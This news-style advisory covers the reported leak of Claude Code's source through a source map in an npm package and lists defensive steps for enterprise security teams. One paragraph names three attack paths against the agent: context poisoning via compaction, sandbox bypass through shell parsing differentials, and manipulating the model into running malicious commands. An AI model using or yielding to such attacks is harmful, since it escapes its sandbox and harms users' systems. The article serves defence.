In the wake of Claude Code's source code leak, 5 actions enterprise security leaders should take now
Anthropic, a company specializing in AI coding agents, recently made headlines for accidentally including a 59.8 MB source map file in version 2.1.88 of its @anthropic-ai/claude-code npm package. This error exposed 512,000 lines of unobfuscated TypeScript code across 1,906 files, revealing sensitive information such as the permission model, security validators, unreleased feature flags, and references to upcoming models.
The security researcher Chaofan Shou discovered this exposure and shared it on X, leading to the rapid spread of mirror repositories on GitHub. Anthropic confirmed that the leak was due to human error and did not involve any customer data or model weights. However, containment efforts failed, prompting the company to file copyright takedown requests to remove unauthorized copies from GitHub.
The leaked code provided insights into the architecture of Anthropic’s AI agent, Claude Code. It revealed details about the agentic harness that enables the model to interact with tools, manage files, execute commands, and orchestrate workflows. Competitors and startups now have a roadmap to replicate Claude Code’s features, potentially compromising its uniqueness.
The leak also highlighted three potential attack paths made cheaper to exploit due to the exposed source code. These include context poisoning through the compaction pipeline, sandbox bypass via shell parsing differentials, and a composition attack that manipulates the model into executing malicious commands.
Security experts emphasized the importance of auditing various layers exposed by the leak, such as the compaction pipeline, bash security validators, MCP server interface contract, feature flags, anti-distillation mechanisms, and undercover mode. They recommended actions like auditing cloned repositories, treating MCP servers as untrusted dependencies, restricting broad permission rules, and implementing commit provenance verification for AI-assisted code.
The incident shed light on the risks associated with AI-assisted development, as evidenced by GitGuardian’s report on increased secret leaks in AI-assisted commits. Gartner advised organizations to demand operational maturity from AI tool vendors, including SLAs, uptime history, and incident response policies. They also suggested creating provider-independent integration boundaries and implementing commit provenance verification.
Security leaders were urged to take immediate actions, such as auditing project configuration files, monitoring MCP servers, restricting bash permissions, demanding vendor accountability, and implementing commit provenance verification. The leak serves as a cautionary tale for enterprises relying on AI-generated code and underscores the need for robust security measures in AI development processes.



